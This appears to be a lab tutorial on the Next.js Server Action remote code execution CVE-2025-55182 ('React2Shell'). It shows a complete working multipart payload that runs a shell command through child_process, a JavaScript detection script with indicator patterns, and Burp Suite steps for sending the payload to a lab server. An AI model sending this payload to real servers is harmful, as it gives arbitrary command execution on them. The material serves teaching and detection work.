# React2Shell: CVE-2025-55182

```
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```

As you learned in the previous tasks, you can spot from `execSync('id'...` that `id` will be executed on the remote server. You also know that this payload returns the command's output to you in the server's response.
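From the defender's side, the request above leaves recognisable traces: a `Next-Action` header together with multipart form fields that carry `$n:__proto__` references, a `constructor:constructor` chain and references to `process.mainModule` / `child_process`. The following is an added example, not code from the lab or from any Next.js project, of a small request-log check that parses a raw HTTP request, splits the multipart body by its boundary and reports which form field contains which indicator. The indicator list and the two sample requests are constructed here; the sample's `_prefix` value is a placeholder, not a command.

```javascript
// Added example (not part of the lab page): flag Server Action requests whose
// multipart form fields carry the indicators visible in the request above.
// Indicator list and sample requests are constructed for this example.

// Indicators taken from the request body shown on the page.
const INDICATORS = [
  { id: "proto-ref", re: /\$\d+:__proto__/ },                  // e.g. "$1:__proto__:then"
  { id: "constructor-chain", re: /constructor:constructor/ },  // e.g. "$1:constructor:constructor"
  { id: "main-module", re: /process\.mainModule/ },
  { id: "child-process", re: /child_process/ },
];

// Split a raw HTTP request into request line, headers (lower-cased names) and body.
function parseRawRequest(raw) {
  const text = raw.replace(/\r\n/g, "\n");
  const sep = text.indexOf("\n\n");
  const head = sep === -1 ? text : text.slice(0, sep);
  const body = sep === -1 ? "" : text.slice(sep + 2);
  const [requestLine, ...headerLines] = head.split("\n");
  const headers = {};
  for (const line of headerLines) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { requestLine, headers, body };
}

// Parse a multipart/form-data body (already normalised to "\n") into
// [{ name, content }] using the boundary from Content-Type; [] if not multipart.
function parseMultipart(contentType, body) {
  const m = /boundary=([^;\s]+)/.exec(contentType || "");
  if (!m) return [];
  const parts = [];
  for (const chunk of body.split("--" + m[1])) {
    const trimmed = chunk.trim();
    if (trimmed === "" || trimmed === "--") continue; // preamble or closing marker
    const part = chunk.replace(/^\n/, "").replace(/\n$/, "");
    const sep = part.indexOf("\n\n");
    const partHead = sep === -1 ? part : part.slice(0, sep);
    const content = sep === -1 ? "" : part.slice(sep + 2);
    const nameMatch = /name="([^"]*)"/.exec(partHead);
    parts.push({ name: nameMatch ? nameMatch[1] : null, content });
  }
  return parts;
}

// Scan one raw request: is it a Server Action call, and which form fields
// contain which indicators?
function scanRequest(raw) {
  const { headers, body } = parseRawRequest(raw);
  const isServerAction = "next-action" in headers;
  const findings = [];
  for (const { name, content } of parseMultipart(headers["content-type"], body)) {
    for (const ind of INDICATORS) {
      const hit = ind.re.exec(content);
      if (hit) findings.push({ part: name, indicator: ind.id, matched: hit[0] });
    }
  }
  return { isServerAction, findings };
}

// Constructed sample modelled on the request shown above. The "_prefix" value
// is a placeholder that only mentions the indicator strings; it runs nothing.
const SUSPICIOUS_REQUEST = [
  "POST / HTTP/1.1",
  "Host: localhost:3000",
  "Next-Action: x",
  "Content-Type: multipart/form-data; boundary=----ExampleBoundary",
  "",
  "------ExampleBoundary",
  'Content-Disposition: form-data; name="0"',
  "",
  '{"then":"$1:__proto__:then","status":"resolved_model",' +
    '"_response":{"_prefix":"<placeholder mentioning process.mainModule and child_process>",' +
    '"_formData":{"get":"$1:constructor:constructor"}}}',
  "------ExampleBoundary",
  'Content-Disposition: form-data; name="1"',
  "",
  '"$@0"',
  "------ExampleBoundary--",
].join("\r\n");

// Constructed benign Server Action call: ordinary serialized arguments, no indicators.
const BENIGN_REQUEST = [
  "POST / HTTP/1.1",
  "Host: localhost:3000",
  "Next-Action: 7f1e2d3c", // constructed action id
  "Content-Type: multipart/form-data; boundary=----ExampleBoundary",
  "",
  "------ExampleBoundary",
  'Content-Disposition: form-data; name="0"',
  "",
  '["hello world"]',
  "------ExampleBoundary--",
].join("\r\n");

for (const [label, raw] of [["suspicious", SUSPICIOUS_REQUEST], ["benign", BENIGN_REQUEST]]) {
  const result = scanRequest(raw);
  console.log(label, result.isServerAction ? "(Server Action)" : "", result.findings);
}
```

The check is deliberately header-agnostic about the action id (`Next-Action: x` in the lab request is not itself an indicator) and looks only at the form-field contents, so the same function can be run over requests captured by a reverse proxy or WAF log regardless of which action was targeted.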

### Sending the Payload via Burp Suite

After you start Burp Suite, you will need to go to the **Repeater** tab. Then click on the “+” button under **Repeater** and choose **New HTTP tab** as shown in the image below.

![](https://1856124319-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7Q04kikCQP9iY2r48j9z%2Fuploads%2FUu2Pqr111GRxuCC91EeM%2Fimage.png?alt=media\&token=14141bfe-136c-48f4-9d1d-abb19094cf7e)

Then paste the above payload verbatim in the Request tab as shown below.

<figure><img src="https://1856124319-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7Q04kikCQP9iY2r48j9z%2Fuploads%2Fluu8ixnRNmTRah9ZaEmR%2Fimage.png?alt=media&#x26;token=a7db7d19-4da9-477d-bc95-8dce19f7b43b" alt=""><figcaption></figcaption></figure>

Before we can click the **Send** button and deliver the payload to the vulnerable server, we still need to specify our target server. Click on **Target: Not specified** to set the target.

<figure><img src="https://1856124319-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7Q04kikCQP9iY2r48j9z%2Fuploads%2FLAG5okba5SavzcXF62mQ%2Fimage.png?alt=media&#x26;token=0b24f4e6-6c82-452d-97aa-6550640dbb1b" alt=""><figcaption></figcaption></figure>

We need to use the following settings:

* Host: `10.48.156.55`
* Port: `3000`
* Note: Our server does **not** use HTTPS, so keep the **Use HTTPS** checkbox clear

<figure><img src="https://1856124319-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7Q04kikCQP9iY2r48j9z%2Fuploads%2FBmvneY1EarizCtmfWpL7%2Fimage.png?alt=media&#x26;token=b1f19dbe-35fd-461f-a798-c868dda55a4a" alt=""><figcaption></figcaption></figure>

Now we are ready to experiment with sending commands to the target server and checking the output in the server response. In the screenshot below, you can see the server's output for running the `id` command.

<figure><img src="https://1856124319-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7Q04kikCQP9iY2r48j9z%2Fuploads%2Fc6k9xgNCdi7jqwoowKkh%2Fimage.png?alt=media&#x26;token=a4e5fc3a-db22-4e8a-a72d-5174457106f0" alt=""><figcaption></figcaption></figure>
